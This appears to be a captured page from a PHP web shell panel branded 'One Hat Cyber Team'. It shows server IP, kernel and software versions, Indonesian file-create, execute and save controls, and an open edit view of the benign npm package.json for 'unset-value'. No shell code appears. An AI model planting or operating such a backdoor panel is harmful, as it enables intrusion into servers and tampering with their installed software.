⚝
One Hat Cyber Team
⚝
Your IP:
172.22.0.1
Server IP:
151.80.20.34
Server:
Linux 794f04d97d5e 5.15.0-143-generic #153-Ubuntu SMP Fri Jun 13 19:10:45 UTC 2025 x86_64
Server Software:
Apache/2.4.62 (Debian)
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
node_modules
/
unset-value
/
Edit File: package.json
{ "name": "unset-value", "description": "Delete nested properties from an object using dot notation.", "version": "2.0.1", "homepage": "https://github.com/jonschlinkert/unset-value", "author": "Jon Schlinkert (https://github.com/jonschlinkert)", "contributors": [ "<wtgtybhertgeghgtwtg@gmail.com> (https://github.com/wtgtybhertgeghgtwtg)", "Jon Schlinkert <jon.schlinkert@sellside.com> (http://twitter.com/jonschlinkert)" ], "repository": "jonschlinkert/unset-value", "bugs": { "url": "https://github.com/jonschlinkert/unset-value/issues" }, "license": "MIT", "files": [ "index.js", "index.d.ts" ], "main": "index.js", "types": "index.d.ts", "engines": { "node": ">=10" }, "scripts": { "test": "mocha" }, "dependencies": { "has-value": "^2.0.2", "isobject": "^4.0.0" }, "devDependencies": { "gulp-format-md": "^0.1.11", "mocha": "*", "should": "*" }, "keywords": [ "del", "delete", "key", "object", "omit", "prop", "property", "remove", "unset", "value" ], "verb": { "related": { "list": [ "get-value", "get-values", "omit-value", "put-value", "set-value", "union-value", "upsert-value" ] }, "toc": false, "layout": "default", "tasks": [ "readme" ], "plugins": [ "gulp-format-md" ], "lint": { "reflinks": true } } }
Simpan